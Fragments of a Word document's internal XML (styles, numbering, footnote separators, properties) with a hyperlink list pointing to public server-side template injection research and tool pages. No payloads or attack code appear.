        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="48741DA4" w14:textId="77777777" w:rsidR="007507D8" w:rsidRDefault="007507D8" w:rsidP="002E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CCD91" w14:textId="6ED7616C" w:rsidR="002E3993" w:rsidRDefault="002E39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C15761" wp14:editId="160B44D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C4A498" w14:textId="1DEB1FDB" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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2E3993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157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7C4A498" w14:textId="1DEB1FDB" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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2E3993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A564" w14:textId="0074538A" w:rsidR="002E3993" w:rsidRDefault="002E39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9B584F1" wp14:editId="2BBBAF23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24A8DD" w14:textId="736EDF3A" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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2E3993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B584F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224A8DD" w14:textId="736EDF3A" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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2E3993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8BEA9" w14:textId="49AC074E" w:rsidR="002E3993" w:rsidRDefault="002E39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A12415" wp14:editId="7B70E18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725D4" w14:textId="25831DDE" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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2E3993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1241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54725D4" w14:textId="25831DDE" w:rsidR="002E3993" w:rsidRPr="002E3993" w:rsidRDefault="002E3993" w:rsidP="002E39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2E3993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92744" w14:textId="77777777" w:rsidR="007507D8" w:rsidRDefault="007507D8" w:rsidP="002E3993">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="24794669" w14:textId="77777777" w:rsidR="007507D8" w:rsidRDefault="007507D8" w:rsidP="002E3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A08"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BE8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52AA5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="550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534BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B470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70187"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF5E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47220"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0DB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F5713"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9DF6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14E97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7AAE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D42AC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15B4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13743"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9ACE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94FD2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="057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91AC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E85A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51079"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="47DC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16C8F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD4E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62B75"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C1F2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9363C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A1AC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87012"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5ACC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001DA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7254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515B71"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7170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D3257"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="009A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AF61D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0BFA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B42EF8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="35FA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550D9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD18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34886"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00CC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254B2A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8DF6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3F33F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3BC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AC004F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07B0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36C70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="951E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B4421B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="764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5D0345"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="564A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111526"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A1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F71102"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D8A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7C7AF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD98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381F3C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D26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8717EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B12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B40688"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="999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027F95"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AF64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CE019E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="884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A8732D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5F4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1F322D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43CA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5C405E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="482E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141782"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37A8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2D02FE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D990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865F14"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ABDC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5A250B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="950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B378C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="66CA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152423"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F6B2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D73B08"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B67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061AC1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="35B2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6965FE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="171C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781DAC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15B0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837563">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1253664606">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1120149740">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1044141407">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1539471715">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="388967678">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1246106111">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="106514112">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1991205400">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="244874772">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="568348451">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1203321386">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="565989764">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1802378812">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="762605760">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1451630574">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="827668610">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="478696036">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="188178069">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1342007005">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1851988489">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="2146001339">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="2092504047">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1989354628">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="569271740">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="879125593">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1721437061">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="279267277">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1421176077">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1777366736">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1411780649">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="591011961">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="2142377913">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1194726746">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1109080101">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="830869813">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1147208042">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1722555440">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="383913148">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1106079853">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1219897454">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="1179199438">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="941110952">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="105348749">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="1188567797">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1496843394">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="256447434">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="1717855044">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="1725182708">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="1407800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CC"/>
    <w:rsid w:val="00240D72"/>
    <w:rsid w:val="002E3993"/>
    <w:rsid w:val="005439CC"/>
    <w:rsid w:val="007507D8"/>
    <w:rsid w:val="00835E55"/>
    <w:rsid w:val="00845DCA"/>
    <w:rsid w:val="00B5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1E1C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EFCC180F-8421-4B54-A6FA-67B055BD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39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E3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E39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3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993"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002E399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E399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E399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2E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ax-w-3xl">
    <w:name w:val="max-w-3xl"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002E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9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3993"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="grid">
    <w:name w:val="grid"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002E3993"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ml-3">
    <w:name w:val="ml-3"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002E3993"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002E39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3993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2E3993"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="leading-normal">
    <w:name w:val="leading-normal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002E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lex">
    <w:name w:val="flex"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002E3993"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="uppercase">
    <w:name w:val="uppercase"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002E3993"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-base">
    <w:name w:val="text-base"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002E3993"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mr-4">
    <w:name w:val="mr-4"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002E3993"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-xs">
    <w:name w:val="text-xs"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002E3993"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="mx-auto">
    <w:name w:val="mx-auto"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="002E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040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1438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86958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614150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9412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08871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4331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5740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318126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329629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11812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934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787442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9578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455670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3399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972238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6154593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562752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2034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0002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1120244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3074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8738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7582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126556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023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80390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8231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1577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5442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5008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0612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89424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23634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648647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6208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067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4429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138884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0719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5834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55513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7089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259675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18628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4376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8049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453124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398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5698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3000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10428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4521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5142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2128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778541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64591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26866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533296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7916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3084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1229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673060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5833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284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6666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227557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0830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610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6432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05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4263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4643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1854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7460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59370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2571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1533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589636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9601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5822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1414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1262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8864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9714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9934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8520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984398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9399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7466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65115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99325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410510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0733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5779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7342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122499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0446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2480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4729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9911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2763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17640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18433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7298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2721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117248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2918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1155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83551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4110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258980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6304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39720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0937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65228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362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64321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6974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4395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158730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6632913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050037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9556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796737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465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6358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65290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5237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20792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648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883335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781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4714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1899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06613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46410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6680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0417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56156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654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781993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28790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305811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50111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41290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7796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09119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3925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5405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90591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507625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8356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8912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3278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9931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58851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735413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61126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5417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5290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36739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1586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1406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119032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35629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560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06581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1897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3218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6554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533001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0896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374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424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09512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194091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0067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6977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59169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7200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09543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7875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334194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3636804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178807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5907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3881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3543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9077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4264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7407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8540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0378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522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6376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5745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0723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937825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7020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84592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8901244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3562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3077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8789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618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9926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7189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8011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2819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43751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2042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93233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67481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532636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6287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6827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9903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080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930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0506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6185074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5135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2695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7289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353055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5256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358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14332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4237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5268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3679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196431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1802550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3130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  <w:divsChild>
            <w:div w:id="17755117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20590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769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422711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8444500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2796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1711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353908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5985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0891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9046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3850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674421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6555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2520302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5374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88180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7394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wisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssti-server-side-template-injection/broken-reference/README.md" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/research/server-side-template-injection" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.schtech.co.uk/razor-pages-ssti-rce/" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/server-side-template-injection/exploiting" TargetMode="External"/><Relationship Id="rId79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hyperlink" Target="https://golang.org/pkg/html/template/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/el-expression-language" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/research/server-side-template-injection" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/veracode-research/spring-view-manipulation" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/HubSpot/jinjava/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cnotin/RazorVulnerableApp" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.onsecurity.io/blog/go-ssti-method-research/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Hackmanit/TInjA" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vladko312/sstimap" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://jinja.pocoo.org/" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Hackmanit/template-injection-table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ithub.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/HubSpot/jinjava/pull/230" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/research/server-side-template-injection" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/research/server-side-template-injection" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/asp/asp_examples.asp" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/flask" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://javamana.com/2021/11/20211121071046977B.html" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/text/template/" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vladko312/sstimap" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DiogoMRSilva/websitesVulnerableToSST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swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/el-expression-language" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pear/HTML_Template_PHPLIB" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Hackmanit/template-injection-table" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/research/server-side-template-injection" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://appcheck-ng.com/template-injection-jsrender-jsviews/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/text/template" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2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pinna/tplmap" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://try.freemarker.apache.org/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ajinabraham.com/blog/server-side-template-injection-in-tornado" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/server-side-template-injection" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Hackmanit/TInjA" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/epinna/tplmap" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/el-expression-language" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/HubSpot/jinjava/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/wernerwa/pat-template" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DiogoMRSilva/websitesVulnerableToSS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6000</Words>
  <Characters>34205</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>285</Lines>
  <Paragraphs>80</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>40125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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-07T08:01:00Z</dcterms:created>
